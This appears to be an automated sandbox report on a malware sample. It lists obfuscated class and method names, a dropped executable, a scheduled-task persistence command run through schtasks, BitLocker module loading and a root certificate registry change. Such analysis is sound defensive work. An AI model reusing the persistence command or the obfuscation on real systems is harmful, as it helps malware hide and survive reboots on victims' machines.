Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, st1dsKfLn6u0rMPrYT.cs	High entropy of concatenated method names: 'I3Kdw3g150', 'uexd7mliXD', 'whSdgJ1oAp', 'DQSd2cT6O6', 'AQNdSpj4fS', 'CYIdt11qX7', 'HVOdmyR3PA', 'WCpd1EQFFS', 'NZNdPp9t1q', 'wSfdnoB3b5'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, oAl2Hsksxhxi2EQuvF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm7upPowGcr', 'SYhpntuoc4', 'iqipz9SZQq', 'kToVa6QNZn', 'cZAV5WFplw', 'B7NVpbHNLy', 'a76VVj3UBp', 'dE7jdXM7bZgLD7bGaR5'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, ekkkRe5aIZpAd5pcdRK.cs	High entropy of concatenated method names: 'X8H0KPh6n4', 'Uri0E2Z2xj', 'JjE0QnxtH3', 'Bqq0vDVyG0', 'Ef50ihh1ZS', 'MaK0x21pQZ', 'fgj0FB5Y2e', 'h5c0fiSvG5', 'D4C0U03BYl', 'Aug0eF1otW'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, Qvw5fqTaMwD3qUIH41.cs	High entropy of concatenated method names: 'QmgXC0Stte', 'ojAXk9hbcs', 'mIjXGHoyFc', 'aJkGnWLQQG', 'aFqGzD8rQX', 'HJeXaLxlx1', 'ea0X58dTob', 'rj4XpI2DTK', 'SAPXVYPYn3', 'svPX6WSS3E'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, skeHuy1OknjT7QIR5Y.cs	High entropy of concatenated method names: 'GrXBCYRIOc', 'bJYBdHg5MK', 'KSWBkGoTQW', 'BdlBqYbqdr', 'CFLBGxN0gY', 'q9eBX7sOI7', 'WplBWtrqR3', 'n5MBMZqYV1', 'nHDBRiP0e9', 'yvcBIoeZH4'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, FSJ5wAg9wfpjNbAye6.cs	High entropy of concatenated method names: 'ToString', 'spcLAmqiqK', 'DmcLbNf3tP', 'PBdLOlFOkv', 'GCTLswWEUn', 'wJOL45S6aZ', 'uS6LlPOK11', 'ds6LTN9LwR', 'jn4LofsUll', 'piHLJo1lpZ'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, lbGCkp5Vtsla7QGfDKN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZRHwnYtNy', 'w4IH7FSqR3', 'qW1HgKTwuW', 'ryKH2hDybW', 'Hq4HSoPUva', 'x1QHtO0Ncs', 'SrSHmAOMMF'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, w3EmhdtvZnNN1x7nyF.cs	High entropy of concatenated method names: 'WkDc1uLJgc', 'D1UcnacmU7', 'TOEBaqcGJb', 'dxdB5fQgFc', 'h9vcAEWirC', 'wVDcr2PLsT', 'oAJcu2uc66', 'LY0cwNOY4D', 'QNZc7SBA5b', 'CTycgvaonE'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, KIEnU8WvlckDlH11VR.cs	High entropy of concatenated method names: 'SRxVNVrHlT', 'peRVCPk3Wl', 'lPbVdXmFn2', 'tqTVkPwCVo', 'oBGVqNUlo6', 'bR8VGVXSXD', 'CPXVXyAnek', 'UWpVWjpeMA', 'f1YVM6gqg9', 'XHmVRYALue'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, IWRIt7dVO6ncMTHeUD.cs	High entropy of concatenated method names: 'Dispose', 'Tyf5PUNq7a', 'qCjpb2JBH5', 'H2VaaPf3UT', 'AHk5neHuyO', 'hnj5zT7QIR', 'ProcessDialogKey', 'bY3paSJ6Gs', 'xxQp50NQir', 'miapp0nRUh'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, Ujy13luVt5WqpjICm0.cs	High entropy of concatenated method names: 'sdM9flVgIF', 'rGG9UhdtQg', 'xWs9jKRETn', 'Suy9bOxO7w', 'Emj9sg51A9', 'q3j94OKQb4', 'DZ59TGyCat', 'HaG9oioJiP', 'JZO98Hjugl', 'IpP9Al8ssc'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, snRUh1niwQbHI6M83f.cs	High entropy of concatenated method names: 'IPi051uMRM', 'DXk0VEGfOA', 'tgZ06uEMGr', 'kJ10CenKXy', 'NFv0dsPFuL', 'ByD0qOniSH', 'sSD0GZ3YpW', 'qArBmoExny', 'PSNB1Kv8sQ', 'pMCBP2QZ8X'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, xSHtdkwgAmsVjQEvL2.cs	High entropy of concatenated method names: 'DiFy8OgaDD', 'beeyrGufcw', 'gW9ywWJ2Xs', 'Dcky7X8ARo', 'KvdybBm3et', 'vOhyOfTPwI', 'AvtysaNuE5', 'S0yy4CX3QP', 'l0vyli1GvU', 'dvHyTZNj2d'
Source: 0.2.FGGx944Qu7.exe.2da0000.0.raw.unpack, eUYxAsz7f1gqDsK0ZX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5N09msF41', 'N7c0yi1WaF', 'PmX0LoqPmc', 'ekR0cJMyer', 'ovB0BhXKIe', 'JTI00NTL71', 'xJy0HY7bKa'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, zKu78MpLNKf7oMfFQh.cs	High entropy of concatenated method names: 'yeEQPBAjg', 'X8rvMF6Ep', 'cXpxLJYUn', 'ekmFhobN0', 'nZoUU0BmC', 'LUOemm62k', 'dOMmVJn131lsq4GBja', 'wkMs46VtcHyKn2fHwc', 'LCNBBGv1J', 'A7QH9iFdN'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, M6TMA9J6gECMJj4ypu.cs	High entropy of concatenated method names: 'doRXKcbtXo', 'woYXEbw58o', 'dsXXQ888a4', 'uCnXvcSHxB', 'bHyXijm4WS', 'VkVXxcyC0l', 'VjPXF44amU', 'XSkXfNVVvQ', 'if9XUPkPVC', 'sh0XeheUWS'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, QOde30UoOmhXIIPqmZ.cs	High entropy of concatenated method names: 'echkvafM7K', 'PYUkxMtIdk', 'vBvkfueFr6', 't02kU4m03H', 'vEikyUpIgN', 'BqAkLZyP2d', 'Hyikcqc8eW', 'BRQkBaeGUC', 'PZSk0AhjOH', 'f6HkHpdb6m'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, zhqWUhjaUqjYNr08Sp.cs	High entropy of concatenated method names: 'u5IGN58ckU', 'QXtGdCVlse', 'QHbGqAqx9f', 'BJEGXq6g1D', 'TAdGWyx7v5', 'ivpqSIkP28', 'ucPqttf7UQ', 'fn4qmhaHiQ', 'OAmq1VFtIG', 'ln5qPsdVB6'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, FJg6Wv5509ZXydNFOJB.cs	High entropy of concatenated method names: 'ToString', 'qMNHVnp9qv', 'pg7H6ckmkc', 'hxJHNRs6Zo', 'WZ2HCosg5b', 'PYRHdeiM6T', 'QDWHkw4ILT', 'WBeHqIXAMf', 'a5KbLU5g2ngujc1ploh', 'MRbi1M5PkMlhtTfA0a3'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, g8X498eSB4ZM9pdKy6.cs	High entropy of concatenated method names: 'zlbqi3QpOm', 'NegqFviFwF', 'OkbkOg4K27', 'xPBksdrOSx', 'd74k40AJ20', 'EJikl6jOZE', 'sBckTxAhVH', 'iFrkoWP90w', 'FDwkJqaov0', 'Rw6k8wauhX'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, Ar0ZDZ6hqqFCb9tOPE.cs	High entropy of concatenated method names: 'XtH5Xt1dsK', 'pn65Wu0rMP', 'roO5RmhXII', 'Xqm5IZd8X4', 'bdK5yy6Qhq', 'kUh5LaUqjY', 'WKY1Qp4Z8fdqwcZ4ri', 'KNK9E6Bd27TgPnLq9j', 'BlT55Kff4U', 'So45VfspTM'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, st1dsKfLn6u0rMPrYT.cs	High entropy of concatenated method names: 'I3Kdw3g150', 'uexd7mliXD', 'whSdgJ1oAp', 'DQSd2cT6O6', 'AQNdSpj4fS', 'CYIdt11qX7', 'HVOdmyR3PA', 'WCpd1EQFFS', 'NZNdPp9t1q', 'wSfdnoB3b5'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, oAl2Hsksxhxi2EQuvF.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'm7upPowGcr', 'SYhpntuoc4', 'iqipz9SZQq', 'kToVa6QNZn', 'cZAV5WFplw', 'B7NVpbHNLy', 'a76VVj3UBp', 'dE7jdXM7bZgLD7bGaR5'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, ekkkRe5aIZpAd5pcdRK.cs	High entropy of concatenated method names: 'X8H0KPh6n4', 'Uri0E2Z2xj', 'JjE0QnxtH3', 'Bqq0vDVyG0', 'Ef50ihh1ZS', 'MaK0x21pQZ', 'fgj0FB5Y2e', 'h5c0fiSvG5', 'D4C0U03BYl', 'Aug0eF1otW'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, Qvw5fqTaMwD3qUIH41.cs	High entropy of concatenated method names: 'QmgXC0Stte', 'ojAXk9hbcs', 'mIjXGHoyFc', 'aJkGnWLQQG', 'aFqGzD8rQX', 'HJeXaLxlx1', 'ea0X58dTob', 'rj4XpI2DTK', 'SAPXVYPYn3', 'svPX6WSS3E'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, skeHuy1OknjT7QIR5Y.cs	High entropy of concatenated method names: 'GrXBCYRIOc', 'bJYBdHg5MK', 'KSWBkGoTQW', 'BdlBqYbqdr', 'CFLBGxN0gY', 'q9eBX7sOI7', 'WplBWtrqR3', 'n5MBMZqYV1', 'nHDBRiP0e9', 'yvcBIoeZH4'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, FSJ5wAg9wfpjNbAye6.cs	High entropy of concatenated method names: 'ToString', 'spcLAmqiqK', 'DmcLbNf3tP', 'PBdLOlFOkv', 'GCTLswWEUn', 'wJOL45S6aZ', 'uS6LlPOK11', 'ds6LTN9LwR', 'jn4LofsUll', 'piHLJo1lpZ'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, lbGCkp5Vtsla7QGfDKN.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PZRHwnYtNy', 'w4IH7FSqR3', 'qW1HgKTwuW', 'ryKH2hDybW', 'Hq4HSoPUva', 'x1QHtO0Ncs', 'SrSHmAOMMF'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, w3EmhdtvZnNN1x7nyF.cs	High entropy of concatenated method names: 'WkDc1uLJgc', 'D1UcnacmU7', 'TOEBaqcGJb', 'dxdB5fQgFc', 'h9vcAEWirC', 'wVDcr2PLsT', 'oAJcu2uc66', 'LY0cwNOY4D', 'QNZc7SBA5b', 'CTycgvaonE'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, KIEnU8WvlckDlH11VR.cs	High entropy of concatenated method names: 'SRxVNVrHlT', 'peRVCPk3Wl', 'lPbVdXmFn2', 'tqTVkPwCVo', 'oBGVqNUlo6', 'bR8VGVXSXD', 'CPXVXyAnek', 'UWpVWjpeMA', 'f1YVM6gqg9', 'XHmVRYALue'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, IWRIt7dVO6ncMTHeUD.cs	High entropy of concatenated method names: 'Dispose', 'Tyf5PUNq7a', 'qCjpb2JBH5', 'H2VaaPf3UT', 'AHk5neHuyO', 'hnj5zT7QIR', 'ProcessDialogKey', 'bY3paSJ6Gs', 'xxQp50NQir', 'miapp0nRUh'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, Ujy13luVt5WqpjICm0.cs	High entropy of concatenated method names: 'sdM9flVgIF', 'rGG9UhdtQg', 'xWs9jKRETn', 'Suy9bOxO7w', 'Emj9sg51A9', 'q3j94OKQb4', 'DZ59TGyCat', 'HaG9oioJiP', 'JZO98Hjugl', 'IpP9Al8ssc'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, snRUh1niwQbHI6M83f.cs	High entropy of concatenated method names: 'IPi051uMRM', 'DXk0VEGfOA', 'tgZ06uEMGr', 'kJ10CenKXy', 'NFv0dsPFuL', 'ByD0qOniSH', 'sSD0GZ3YpW', 'qArBmoExny', 'PSNB1Kv8sQ', 'pMCBP2QZ8X'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, xSHtdkwgAmsVjQEvL2.cs	High entropy of concatenated method names: 'DiFy8OgaDD', 'beeyrGufcw', 'gW9ywWJ2Xs', 'Dcky7X8ARo', 'KvdybBm3et', 'vOhyOfTPwI', 'AvtysaNuE5', 'S0yy4CX3QP', 'l0vyli1GvU', 'dvHyTZNj2d'
Source: 0.2.FGGx944Qu7.exe.4cb28d0.5.raw.unpack, eUYxAsz7f1gqDsK0ZX.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i5N09msF41', 'N7c0yi1WaF', 'PmX0LoqPmc', 'ekR0cJMyer', 'ovB0BhXKIe', 'JTI00NTL71', 'xJy0HY7bKa'

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

File created: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\FGGx944Qu7.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TBsjWljiCpR" /XML "C:\Users\user\AppData\Local\Temp\tmp1454.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 Blob

Jump to behavior

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
